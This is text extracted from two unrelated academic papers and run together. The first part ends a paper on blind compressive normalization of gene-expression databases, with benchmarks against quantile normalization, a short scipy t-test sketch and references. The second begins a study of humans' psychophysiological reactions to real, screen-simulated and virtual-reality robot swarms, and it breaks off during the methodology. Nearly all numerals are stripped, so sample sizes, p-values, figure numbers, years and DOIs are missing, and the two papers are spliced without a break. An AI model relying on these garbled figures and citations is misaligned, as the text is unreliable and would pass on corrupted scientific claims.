d and c are likely due to constraints in the construction of the measurement operator; only full rows and columns are considered for blind recovery in fig. d, which for matrix dimensions of × create measurement increments of step size . notably, these do not overlap exactly with the more fine grained scale of k-sparse recovery. recovery robustness we continue our evaluation of blind recovery in figs. a and d with a focus on recovery robustness. in particular, we observe that for the case of non-ideal redundancies, blind bias recovery is still feasible, as shown in fig. a. accordingly, as the redundant signal increases from weak redundancies (ρ= . ) to strong redundancies (ρ= . ) fewer measurements are necessary to blindly recover an unknown bias matrix (see fig. a). thus, blind recovery is somewhat robust to imperfect redundancies likely found in actual high-throughput databases. in fig. c we observe that lower accuracy in the form of falsely estimated redundancies (e.g., wrong pairs of correlated features or samples) are recoverable up to a certain degree. in addition, we provide a comparison with k-sparse recovery for an identical setup, where redundancy and estimation accuracy are modeled as additive noise in y (see fig. b) and shuffled measurement operator a (see fig. d). both approaches perform well in the robustness evaluation, but it is difficult to align their scales for quantitative comparison. benchmarking in order to benchmark the developed blind recovery approach we mimic a standard research problem involving high-throughput data and compare to a widely used unsupervised normalization approach. the aim is to identify differentially expressed genes under different noise conditions at a given significance level (p= . ). for this purpose a high-throughput database is simulated as in ‘simulation’ (see data availability). it contains samples with measured genes (features) each and two groups of replicates that are used to determine differential expression by a standard t-test. 
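the benchmark's differential-expression call reduces to a gene-wise two-sample t-test between the two groups of replicates, with the resulting p-values compared against the significance level; a minimal scipy sketch is shown below. the number of genes, the group sizes and the effect sizes are synthetic placeholders, not the values used in the paper.

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(2)

# synthetic expression data: genes x replicates for two groups
n_genes, n_reps = 100, 5
group_a = rng.normal(0.0, 1.0, size=(n_genes, n_reps))
group_b = rng.normal(0.0, 1.0, size=(n_genes, n_reps))
group_b[:10] += 2.0   # a handful of genes are truly differentially expressed

# gene-wise two-sample t-test between the two groups of replicates
t_stat, p_vals = stats.ttest_ind(group_a, group_b, axis=1)

alpha = 0.05
print("average p-value:", p_vals.mean())
print("genes called differentially expressed:", int((p_vals < alpha).sum()))
```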
we force accurate estimation of correlations and corresponding standard deviations, as the small database size yields poor estimates that cause the recovery to be unstable for the limited number of available measurements (see figs. a, c). the benchmark is performed across different noise conditions: random ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure robustness of blind and -sparse recovery. (a, b) as redundancy increases from weak (ρ = . ) to strong (ρ= . ) less measurements are required to blindly recover the low-rank bias (rank- , × ). (c, d) as the accuracy of estimating signal redundancies from the confounded observations increases, the measurements required to blindly recover the low-rank bias (rank- , × ) are reduced. the cor- responding -sparse recovery is simulated for additive noise in y or shuffling in a to mimic the effect of varying redundancy and estimation accuracy for the non-blind case. full-size doi: . /peerjcs. /fig- noise derived from n( , ), systematic noise with rank- as outlined in ‘simulation’ and no noise (see table ). in the case of random noise, both approaches perform similarly and are unable to reverse the effect of the corruption through normalization. thus, no differentially expressed genes are detected at the given significance level (p= . ), which is expected. in the case of systematic noise, the blind compressive normalization (bcn) approach outperforms quantile normalization (qn) and is able to detect differential expression given the accurate estimation of correlations and corresponding standard deviations. in the case of no ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of blind compressive normalization (bcn) with quantile normalization (qn) and no correction (nc) of the corrupted data. data was corrupted with random, systematic and no noise. a t-test is performed between two groups of replicates (five each) for all genes ( in total) and the result- ing p-values are averaged. plus (+) and minus (−) denote if the avg. p-value falls below the significance level of . , where the expected avg. p-value for no noise and no correction is . e– . bcn (avg. p-value) qn (avg. p-value) nc (avg. p-value) random noise − . e– − . e– − . e– systematic noise + . e– − . e– − . e– no noise + . e– + . e– + . e– noise, no correction (nc) performs best, followed by the qn and bcn approach. both approaches are able to detect differentially expressed genes for the case of no noise. overall, this benchmark shows that the developed approach can outperform existing approaches on a standard research problem under idealized conditions. discussion a key aspect of the proposed algorithm for blind normalization of high-throughput databases is the sparsity assumption (see introduction). by assuming that bias has a sparse structure, due to a limited number of confounding factors, the recovery problem becomes manageable and efficient optimization on manifolds can be used for recovery. the larger a high-throughput database is in size, the more effectively we can leverage the associated redundancies, since we can focus on correlations estimated with high-specificity and low-sensitivity. this is critical, as blind recovery requires a sufficient number of accurately estimated correlations. in addition, spike-in controls can provide further constraints on the bias to be recovered. 
these can be important sources of additional information to be leveraged by our approach, as integration through additional measurements via entry sensing is straight forward (see ‘k-sparse recovery’). but, it remains an open question how such absolute and relative constraints interact when solving the bias recovery problem (see definition ). for the sparsity assumption to be of use for blind normalization, two further assumptions must be satisfied. sufficient redundancies are needed in the form of correlations found in the high-throughput database at hand. this assumption is generally satisfied, since complex systems under study, such as the cell, generally display a number of strong correlations that are detectable despite the effect of confounding factors. in addition, high-throughput databases of a certain size are likely to contain redundancies in the form of similar biological samples that can be leveraged. finally, blind normalization is only possible if the detected correlations are sufficiently incoherent with the low-dimensional bias model. the likelihood of such incoherence is maximized if correlated features and samples exhibit standard deviations similar to those drawn from a normal distribution, such as in the presented case of k-sparse recovery (see ‘k-sparse recovery’). in the setting of blind recovery, this assumption may only be satisfied for features and not for samples, as correlated samples have generally similar standard deviations. however, when evaluating ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recovery performance in simulation this does not appear to play a major role (see figs. – ). a theoretical investigation of worst case performance and recovery guarantees is still outstanding, but recent work in the field of blind deconvolution and compressed sensing is in active pursuing this question (stöger, jung & krahmer, ). to scale the developed algorithm to current public high-throughput databases with features and samples on the order of hundred thousands respectively, the memory consumption of the underlying manifold optimization routines needs to be optimized to be efficient on the scale of gigabytes. however, the manifold optimization routines leveraged in our proof-of-concept implementation are not able to exploit the advantages that come with sparse measurement operators, e.g., a low-memory footprint. this is due to the use of conjugate gradient methods that rely on automatic differentiation (maclaurin, duvenaud & adams, ) and require the use of memory inefficient dense matrices. the current implementation is thus only able to handle databases on the order of hundreds of features and samples respectively. hence, an application outside of the scope of the conducted simulations is currently not feasible and should be addressed in future work. however, there appears to be no theoretical limitation that would preclude the development of a memory efficient implementation. this is important, since the proposed approach increases in effectiveness as database size grows and thereby allows the leveraging of more redundancies (see fig. b). an additional challenge exists when using fixed rank constraints in matrix recovery problems, as is the case for the employed manifold optimization routines. the fixed rank of the to be recovered low-rank matrix is generally not known a priori. thus, optimization routines need to be run multiple times for different rank parameters in order to determine the optimal rank. 
this is an inefficient scheme when contrasted to recovery methods based on nuclear norm regularization (mazumder, hastie & tibshirani, ). furthermore, inappropriate choices of the rank parameter can result in ill-conditioned matrices for which manifold optimization routines may converge slowly. to address these challenges, a pursuit type scheme has been developed recently that can be understood as a warm start technique (tan et al., ). conclusion blind compressive normalization is a systematic approach to the blind normalization of unknown confounding factors in public high-throughput databases. the presented proof-of-concept shows that such an approach is possible under reasonable assumptions. further work in this direction has the potential to address long standing challenges in high-throughput data integration that are becoming increasingly important. acknowledgements we thank bence mélykúti for comments that improved the manuscript. melanie boerries and hauke bush are designated equal last authors due to a shared research group at the time of this work. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by lungsys (bmbf # g) and gerontosys (bmbf # d). hauke busch was supported through the dfg excellence cluster exc . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: lungsys: bmbf # g. gerontosys: bmbf # d. dfg excellence cluster: exc . competing interests the authors declare there are no competing interests. author contributions • sebastian ohse conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • melanie boerries and hauke busch analyzed the data, contributed reagents/materials/- analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/a ec /bcn. supplemental data is available at https://github.com/a ec /bcn/blob/master/ resource/supplementary_data.zip. references allen gi, tibshirani r. . inference with transposable data: modelling the effects of row and column correlations. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /j. - . . .x. barrett t, wilhite se, ledoux p, evangelista c, kim if, tomashevsky m, mar- shall ka, phillippy kh, sherman pm, holko m, yefanov a, lee h, zhang n, robertson cl, serova n, davis s, soboleva a. . ncbi geo: archive for functional genomics data sets—update. nucleic acids research (d ):d –d doi . /nar/gks . benito m, parker j, du q, wu j, xiang d, perou cm, marron js. . adjust- ment of systematic microarray data biases. bioinformatics ( ): – doi . /bioinformatics/btg . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/a ec /bcn https://github.com/a ec /bcn/blob/master/resource/supplementary_data.zip https://github.com/a ec /bcn/blob/master/resource/supplementary_data.zip http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /peerj-cs. bolstad bm, irizarry ra, Åstrand m, speed tp. . 
a comparison of normalization methods for high density oligonucleotide array data based on variance and bias. bioinformatics ( ): – doi . /bioinformatics/ . . . cai tt, zhang a. . rop: matrix recovery via rank-one projections. the annals of statistics ( ): – doi . / -aos . candes ej, plan y. . matrix completion with noise. proceedings of the ieee ( ): – doi . /jproc. . . candes ej, plan y. . tight oracle inequalities for low-rank matrix recovery from a minimal number of noisy random measurements. ieee transactions on information theory ( ): – doi . /tit. . . candès ej, wakin mb. . an introduction to compressive sampling. ieee signal processing magazine ( ): – doi . /msp. . . cheadle c, vawter mp, freed wj, becker kg. . analysis of microarray data using z score transformation. the journal of molecular diagnostics ( ): – doi . /s - ( ) - . friedman j, hastie t, tibshirani r. . the elements of statistical learning. springer series in statistics, vol. . berlin: springer. hastie t, tibshirani r, wainwright m. . statistical learning with sparsity: the lasso and generalizations. boca raton: crc press. haug k, salek rm, conesa p, hastings j, de matos p, rijnbeek m, mahendraker t, williams m, neumann s, rocca-serra p, maguire e, gonzález-beltrán a, sansone s-a, griffin jl, steinbeck c. . metabolights—an open-access general-purpose repository for metabolomics studies and associated meta-data. nucleic acids research :d –d . huber w, von heydebreck a, sültmann h., poustka a, vingron m. . vari- ance stabilization applied to microarray data calibration and to the quan- tification of differential expression. bioinformatics (suppl ):s –s doi . /bioinformatics/ .suppl_ .s . irizarry ra, bolstad bm, collin f, cope lm, hobbs b, speed tp. . summaries of affymetrix genechip probe level data. nucleic acids research ( ):e –e . jain p, netrapalli p, sanghavi s. . low-rank matrix completion using alternating minimization. in: proceedings of the forty-fifth annual acm symposium on theory of computing. acm, – . johnson we, li c, rabinovic a. . adjusting batch effects in microarray expression data using empirical bayes methods. biostatistics ( ): – doi . /biostatistics/kxj . joyce ar, palsson bØ. . the model organism as a system: integrating’omics’ data sets. nature reviews molecular cell biology ( ): – doi . /nrm . lazar c, meganck s, taminau j, steenhoff d, coletta a, molter c, weiss-solís dy, duque r, bersini h, nowé a. . batch effect removal methods for microarray gene expression data integration: a survey. briefings in bioinformatics : – . li c, wong wh. . model-based analysis of oligonucleotide arrays: model validation, design issues and standard error application. genome biology ( ): . – . . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / -aos http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bioinformatics/ .suppl_ .s http://dx.doi.org/ . /biostatistics/kxj http://dx.doi.org/ . /nrm http://dx.doi.org/ . /peerj-cs. lovén j, orlando da, sigova aa, lin cy, rahl pb, burge cb, levens dl, lee ti, young ra. . revisiting global gene expression analysis. cell ( ): – doi . /j.cell. . . . maclaurin d, duvenaud d, adams rp. . autograd: effortless gradients in numpy. in: icml automl workshop. mazumder r, hastie t, tibshirani r. . spectral regularization algorithms for learning large incomplete matrices. 
journal of machine learning research (aug): – . mccall mn, uppal k, jaffee ha, zilliox mj, irizarry ra. . the gene expres- sion barcode: leveraging public data repositories to begin cataloging the human and murine transcriptomes. nucleic acids research (suppl ):d –d doi . /nar/gkq . montgomery dc. . design and analysis of experiments. new york: john wiley & sons. parker hs, corrada bravo h, leek jt. . removing batch effects for prediction prob- lems with frozen surrogate variable analysis. peerj :e doi . /peerj. . seita j, sahoo d, rossi dj, bhattacharya d, serwold t, inlay ma, ehrlich li, fathman jw, dill dl, weissman il. . gene expression commons: an open platform for absolute gene expression profiling. plos one ( ):e doi . /journal.pone. . stöger d, jung p, krahmer f. . blind deconvolution and compressed sensing. in: compressed sensing theory and its applications to radar, sonar and remote sensing (cosera), th international workshop on. ieee, – . tan m, tsang iw, wang l, vandereycken b, pan sj. . riemannian pursuit for big matrix recovery. in: icml, vol. . beijing: jmlr.org, – . available at http://dl.acm.org/citation.cfm?id= . . townsend j, koep n, weichwald s. . pymanopt: a python toolbox for optimization on manifolds using automatic differentiation. journal of machine learning research ( ): – . vandereycken b. . low-rank matrix completion by riemannian optimization. siam journal on optimization ( ): – doi . / . vizcaíno ja, csordas a, del toro n, dianes ja, griss j, lavidas i, mayer g, perez- riverol y, reisinger f, ternent t, xu q-w, wang r, hermjakob h. . update of the pride database and its related tools. nucleic acids research (d ):d –d doi . /nar/gkv . wagner a, zuk o. . low-rank matrix recovery from row-and-column affine measurements. arxiv preprint. arxiv: . . wei k, cai j-f, chan tf, leung s. . guarantees of riemannian optimization for low rank matrix recovery. siam journal on matrix analysis and applications ( ): – doi . / m . zhong k, jain p, dhillon is. . efficient matrix sensing using rank- gaussian measurements. in: international conference on algorithmic learning theory. berlin: springer, – . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . / http://dx.doi.org/ . /nar/gkv http://arxiv.org/abs/ . http://dx.doi.org/ . / m http://dx.doi.org/ . /peerj-cs. investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction gaëtan podevijn , rehan o’grady , carole fantini-hauwel and marco dorigo iridia, université libre de bruxelles, belgium research center of clinical psychology, psychopathology and psychosomatic, université libre de bruxelles, belgium abstract the reality gap is the discrepancy between simulation and reality—the same behavioural algorithm results in different robot swarm behaviours in simulation and in reality (with real robots). in this paper, we study the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. we compare the psychophysiological reactions of participants interacting with a simulated robot swarm and with a real (non-simulated) robot swarm. 
our results show that a real robot swarm provokes stronger reactions in our participants than a simulated robot swarm. we also investigate how to mitigate the effect of the reality gap (i.e., how to diminish the difference in the psychophysiological reactions between reality and simulation) by comparing psychophysiological reactions in simulation displayed on a computer screen and psychophysiological reactions in simulation displayed in virtual reality. our results show that our participants tend to have stronger psychophysiological reactions in simulation displayed in virtual reality (suggesting a potential way of diminishing the effect of the reality gap). subjects human-computer interaction, adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, robotics keywords swarm robotics, human-swarm interaction, psychophysiology, reality gap introduction in a near future, swarms of autonomous robots are likely to be part of our daily life. whether swarms of robots will be used for high-risk tasks (e.g., search and rescue, demining) or for laborious tasks (e.g., harvesting, environment cleaning, grass mowing) (dorigo, birattari & brambilla, , dorigo et al., ), it will be vital for humans to interact with these robot swarms (e.g., supervise, issue commands or receive feedback). recently, human-swarm interaction has become an active field of research. more and more, researchers in human-swarm interaction validate their work by performing user studies (i.e., group of human participants performing an experiment of human-swarm interaction). however, a large majority of the existing user studies are performed exclusively in simulation, with human operators interacting with simulated robots on a computer screen (e.g., bashyal & venayagamoorthy, ; nunnally et al., ; de la croix & egerstedt, ; walker et al., ; kolling et al., ; walker et al., ; pendleton & goodrich, ; nagavalli et al., ). how to cite this article podevijn et al. ( ), investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction. peerj comput. sci. :e ; doi . /peerj-cs. submitted april accepted august published september corresponding author gaëtan podevijn, gpodevij@ulb.ac.be academic editor jason jung additional information and declarations can be found on page doi . /peerj-cs. copyright podevijn et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:gpodevij@�ulb.�ac.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ simulation is a convenient choice for swarm roboticists, as it allows experimental conditions to be replicated perfectly in different experimental runs. even more importantly, gathering enough real robots to make a meaningful swarm is often prohibitively expensive in terms of both money and time. however, conducting user studies in simulation suffers from a potentially fundamental problem—the inherent discrepancy between simulation and the reality (henceforth referred to as the reality gap). in this paper, we study the effect of the reality gap on human psychology. 
understanding the psychological impact of any interactive system (be it human-computer interaction, human-robot interaction or human-swarm interaction) on its human operator is clearly essential to the development of an effective interactive system (carroll, ). to date, it is not yet clear what the effect of the reality gap is on human psychology in human-swarm interaction studies. our goal is to study this effect. we present an experiment in which humans interact with a simulated robot swarm displayed on a computer screen, with a simulated robot swarm displayed in virtual reality (within a virtual reality headset) and with a real (i.e., non-simulated) robot swarm (see fig. ). in our experimental setup, our goal was to produce results that were as objective as possible. to this end, we firstly recorded psychological impact using psychophysiological measures (e.g., heart-rate, skin conductance), which are considered more objective than purely questionnaire-based methods (bethel et al., ). secondly, we made purely passive the interaction of our human operators with the robot swarm. in this purely passive interaction, our participants do not issue any commands to, nor receive any feedback from the robot swarm. finally, we decided that our participants would interact with a robot swarm executing a simple random walk behaviour (compared to a more complex foraging behaviour, for instance). these two choices allow us to isolate the reality gap effect. the passive interaction reduces the risk that psychophysiological reactions to the interaction interface (e.g., joystick, keyboard, voice commands) would be the strongest measurable reaction, drowning out the difference in reaction to the reality gap. the choice of a simple random walk behaviour reduces the risk that any psychophysiological reactions are caused by reactions to artefacts of a complex swarm robotics behaviour. our results show that our participants have stronger psychophysiological reactions when they interact with a real robot swarm than when they interact with a simulated robot figure example of an experiment. (a) a participant interacts with a swarm made up of real robots. (b) a participant is attached to a virtual reality head set and interacts with a simulated swarm of robots. (c) a participant interacts with a simulated swarm of robots displayed on a computer screen. the participant shown in this figure is the first author of this paper and did not take part in the experiment. the pictures shown in this figure were taken for illustration purpose. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ swarm (either displayed on a computer screen or in a virtual reality headset). our results also show that our participants reported a stronger level of psychological arousal when they interacted with a robot swarm simulated in a virtual reality headset than when they interacted with a robot swarm simulated on a computer screen (suggesting that virtual reality is a technology that could potentially mitigate the effect of the reality gap in human-swarm interaction user studies). we believe the results we present here should have a significant impact on best-practices for the future human-swarm interaction design and test methodologies. related literature human-swarm interaction, the field of research that studies how human beings can interact with swarm of autonomous robots, is getting more and more attention. 
some research focuses on more technical aspects, such as control methods (direct control of the robots, or indirect control of the robots) (kolling et al., ), the effect of neglect benevolence (determining the best moment to issue a command to a swarm) (walker et al., ; nagavalli et al., ), the interaction based on gestures (podevijn et al., ; nagi et al., , nagi et al., ) or the effect of bandwidth limitation during the interaction (nunnally et al., ). these examples do not constitute an exhaustive review of the literature. for a more comprehensive survey, we refer the reader to kolling et al. ( ). to date, however, very little research in the human-swarm interaction literature has focused on the psychology of humans interacting with robot swarms. de la croix & egerstedt ( ) studied the effect of communication network topologies (made by the robots) on humans. the authors found that when humans control a swarm of robots, certain types of topologies increased the workload. walker et al. ( ) and amraii et al. ( ) investigated the effect of two command propagation methods (i.e., methods to propagate a command issued by a human being to all the robots of a swarm) when a human operator guides a leader robot (i.e., a single robot). in their work, a human operator guides the leader robot by changing the leader robot’s velocity and heading through a graphical interface. they compared the flooding propagation method to the consensus propagation method. in the flooding propagation method, the robots of the swarm controlled by a human operator all set their velocity and heading to the leader robot’s velocity and heading. in the consensus propagation method, the robots of the swarm all set their velocity and heading to the average velocity and heading of their neighbors. the authors showed that the humans’ workload is lower in the flooding propagation method than in the consensus propagation method. setter et al. ( ) studied the humans’ workload level when a human being guides a robot swarm with an haptic control device (i.e., a device allowing a human to guide the robots and to receive haptic feedback from the robots). pendleton & goodrich ( ) studied the effect of the robot swarm size (i.e., the number of robots in a swarm) on the human workload level. they conducted an experiment in which participants had to guide swarms of , and simulated robots. they found that human workload is not dependent on the number of robots when interacting with a robot swarm. podevijn et al. ( ) studied the podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ effect of the robot swarm size on the human psychophysiological state. they found that higher robot swarm sizes provoke stronger psychophysiological responses. with the exception of setter et al. ( ) and podevijn et al. ( ), all the works that study the psychology of humans interacting with a robot swarm are performed in simulation only. due to the inherent existence of the reality gap, though, it is not clear if human-swarm interaction studies performed in simulation only would provoke the same psychological reactions as the same human-swarm interaction studies performed with a robot swarm made up of real robots. the question of the psychological reaction differences when humans interact with a real robot or with a simulated robot has been already addressed in the research field of social robotics. 
in social robotics, the goal of the robot designers is for the robot to socially interact with humans (hegel et al., ). most of the works that address the question of the humans’ psychological reaction differences between the interaction with real robots and simulated robots in social robotics tend to show that humans prefer to interact with a real robot than with a simulated robot. in the following research, all authors used a measure of “enjoyment.” the enjoyment is assessed either by a self-developed questionnaire, or by following the game flow model (a model developed to evaluate player enjoyment in games (sweetser & wyeth, )). when a robot provides humans with help and instructions on a given task, kidd & breazeal ( ), wainer et al. ( ) and fasola & matari�c ( ) all reported that humans had a more enjoyable experience (assessed by a self-developed questionnaire) with a real robot compared to a simulated robot. pereira et al. ( ) and leite et al. ( ) also show that humans had a more enjoyable experience with a real robot than with a simulated robot when their participants were playing chess against the robot (both assessed by the game flow model). in powers et al. ( ), the participants of the authors’ study conversed with a real robot and with a simulated robots about health habits. the results of the study revealed that their participants reported to have a more enjoyable conversation with the real robot than with the simulated robot (assessed by a self-developed questionnaire). wrobel et al. ( ) performed an experiment in which elder participants play a card game against a computer, a real robot and a simulated robot. in their results, their participants reported more joy playing against the computer than against the real robot or the simulated robot. however, their participants had a more enjoyable experience playing against the real robot than against the simulated robot (assessed by the game flow model). for a more comprehensive survey about the psychological differences when humans interact with real robots and simulated robots, we refer the reader to li ( ). our work is different from the existing body of research in human-robot interaction because the interaction between humans and robot swarms is inherently different from the interaction between humans and a single robot. this difference is firstly due to the relative simplicity of the robots used in swarm robotics. robots used in swarm robotics are not equipped with dedicated communication hardware (such as speech- based or text-based communication). even if they were equipped with dedicated communication hardware, it would be overwhelming—due to the large number of robots— for a human operator to send data (e.g., commands) to and receive data (e.g., feedback) podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ from each individual robot. a second reason for the difference is that there is no social interaction between human beings and robot swarms. in this paper, we study the differences in psychological reactions when a human being passively interacts with a real robot swarm, with a simulated robot swarm displayed in a virtual reality environment, and with a simulated robot swarm displayed on a computer screen. 
moreover, while all of the aforementioned social robotic works only use dedicated psychological questionnaires to study the participants’ psychological reactions, we use a combination of psychological questionnaire and physiological measures in order to study the psychophysiological reactions of participants interacting with a robot swarm. methodology hypotheses a review of the human-swarm interaction literature reveals that the majority of the user experiments are performed in simulation. we believe that conducting a human-swarm interaction experiment in simulation can lead to different results than if the same experiment was conducted with real robots. a reason for the results to be different in simulation and in reality is the inherent presence of the reality gap. it is not always possible, however, to perform a human-swarm interaction with real robots (e.g., because an experiment requires a large number of robots). it is our vision that the effects of the reality gap in simulation should be mitigated as much as possible. in order to mitigate the effects of the reality gap, we propose to use virtual reality for simulating the robot swarm. we based the experiment of this paper on these two hypotheses: � the psychophysiological reactions of humans are stronger when they interact with a real robot swarm than when they interact with a simulated robot swarm. � the psychophysiological reactions of humans are stronger when they interact with a simulated robot swarm displayed in virtual reality than when they interact with a simulated robot swarm displayed on a computer screen. confirming the first hypothesis would imply that human-swarm interaction experiments should be done with real robots instead of simulation. confirming the second hypothesis would imply that in order to mitigate the effect of the reality gap (if it is not possible to use real robots), it is better for a researcher to simulate a robot swarm in virtual reality because it provokes in humans more realistic psychophysiological reactions compared to simulated robots displayed on a computer screen. experimental scenario we designed an experimental scenario that allowed us to study the effect of the reality gap on humans in the context of human-swarm interaction. to study the effect of the reality gap, we divided our experimental scenario into three sessions. the order of the three sessions was randomly assigned to our participants. in each session, a participant has to supervise (i.e., watch attentively) a swarm made up of robots. in the so-called real robots session, the participant supervises a real (i.e., non-simulated) swarm of robots podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ (see fig. a). in the screen simulation session, the participant supervises a simulated swarm of robots displayed on a computer screen. in this session, the robot swarm is visible to the participant from the top view (see fig. b). in the virtual reality session, the participant supervises a simulated swarm of robots displayed in a virtual reality environment. the participant wears a virtual reality headset (i.e., a smartphone put in a google virtual reality cardboard (https://www.google.com/get/cardboard) and is immersed in a d virtual world in which simulated robots are present (see fig. c). during the three sessions (i.e., real robots, screen simulation, virtual reality), the participant has to supervise the robots for a period of s. 
measures we used two types of measures: self-reported measures and psychophysiological measures. we use self-reported measures (i.e., data gathered from our participants using a dedicated psychological questionnaire) to determine whether our participants are subjectively conscious of their psychophysiological reaction changes and whether these reaction changes are positive (i.e., our participants report to have a positive experience) or negative (i.e., our participants report to have a negative experience). we use psychophysiological measures, on the other hand, to determine objectively the psychological state of our participants based on physiological responses. these psychophysiological measures are considered objective because it is difficult for humans to intentionally manipulate their physiological responses (for instance to intentionally decrease heart rate). in the following two sections, we first present the self-reported measures used in this study. then, we present the psychophysiological measures. self-reported measure in this study, we collect our participants’ self-reported affective state. we measure our participants’ affective state with two scales: valence and arousal. valence is the cognitive judgement (i.e., pleasure or displeasure) of an evaluation such as the interaction with robots considered in this study. higher valence values correspond to greater pleasure, while lower valence values correspond to a less pleasurable experience. the arousal scale assesses the mental alertness and the level of physical activity or level of excitation (mehrabian, ) felt during an evaluation. figure robots and environments for each of the three sessions. (a) view of the real robots and environment. the view is displayed from the participant’s perspective. (b) top view of the robots and of the environment simulated on a computer and displayed on a screen. (c) view of the robots and of the environment simulated in virtual reality. the view is displayed from the participant’s perspective. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.google.com/get/cardboard http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we developed an open source electronic version of the self-assessment manikin (sam) questionnaire (lang, ). this electronic version of the sam questionnaire runs on a tablet device. the sam questionnaire represents the values of the arousal scale and of the valence scale with a picture. in this version of the sam questionnaire, each scale is composed of nine values represented by five pictures and four inter-points between each of the five pictures (i.e., a value of the scale that is not represented by a picture). the tablet application displays the scales in a vertical arrangement where the top-most picture represents the lowest level of the scale (e.g., lowest level of arousal), and the bottom-most picture represents the highest level of the scale (e.g., highest level of arousal). each picture and each inter-point are associated with a numerical score. numerical scores vary from to . in the valence scale, corresponds to the lowest level of valence (i.e., pleasure is minimal) and corresponds to the highest level of valence (i.e., pleasure is maximal). in the arousal scale, corresponds to the lowest level of arousal (i.e., excitement is minimal) and corresponds to the highest level of arousal (i.e., excitement is maximal). fig. shows a screen-shot of the sam questionnaire running on a tablet device. 
psychophysiological measure physiological responses can be used to study the human psychophysiological state (e.g., emotional state or cognitive state). physiological responses are activated by the autonomic nervous system. the autonomic nervous system is divided into the sympathetic nervous system and the parasympathetic nervous system. the sympathetic nervous system is considered to be responsible for the activation of the fight-or-flight physiological responses (i.e., physiological responses in case of stress). the parasympathetic nervous system, on the other hand, is considered to be responsible for maintaining physiological responses to a normal activity (i.e., the physiological responses at rest). the electrodermal activity (i.e., the skin’s electrical activity) and the cardiovascular activity are two common physiological activities used in the literature to study the autonomic nervous system. in this research, we study our participants’ electrodermal activity by monitoring their skin conductance level (scl) and we study our participants’ cardiovascular activity by monitoring their heart rate. the scl is a slow variation of the skin conductance over time and is measured in microsiemens (ms). an increase of the scl is only due to an increase of the sympathetic nervous system activity. it is, therefore, a measure of choice to study the human fight-or- flight response. scl has also been correlated to the affective state’s arousal (boucsein, ). the heart rate is the number of heart beats per unit of time. it is usually measured in beats per minute (bpm). unlike the scl though, variation of the heart rate can not be unequivocally associated with a variation of the sympathetic nervous system only. heart rate can vary due to either a variation of the sympathetic nervous system, a variation of the parasympathetic nervous system, or a combination of both (cacioppo, tassinary & berntson, ). heart rate activity is, therefore, more difficult to analyse and interpret than the scl. because the physiological responses can vary between individuals, it is difficult to compare the physiological responses of an individual with those of another. in order podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ figure electronic version of the self-assessment manikin questionnaire. (a) the valence scale. the top-most picture corresponds to the lowest level of valence. the bottom-most picture corresponds to the highest level of valence. (b) the arousal scale. the top-most picture corresponds to the lowest level of arousal. the bottom-most picture corresponds to the highest level of arousal. the pictures used in the application are taken from and available at http://www.pxlab.de (last access: april ). podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.pxlab.de http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to compare the physiological responses between our participants, we first recorded our participants’ physiological responses at rest (i.e., the baseline), then we recorded our participants’ physiological responses during the experiment. in our statistical analyses, we use the difference between our participants’ physiological responses at rest and during the experiment. equipment and experimental setup physiological response acquisition we monitored our participants’ physiological responses with a powerlab t (adinstruments) data acquisition system augmented with a gsr amp device. 
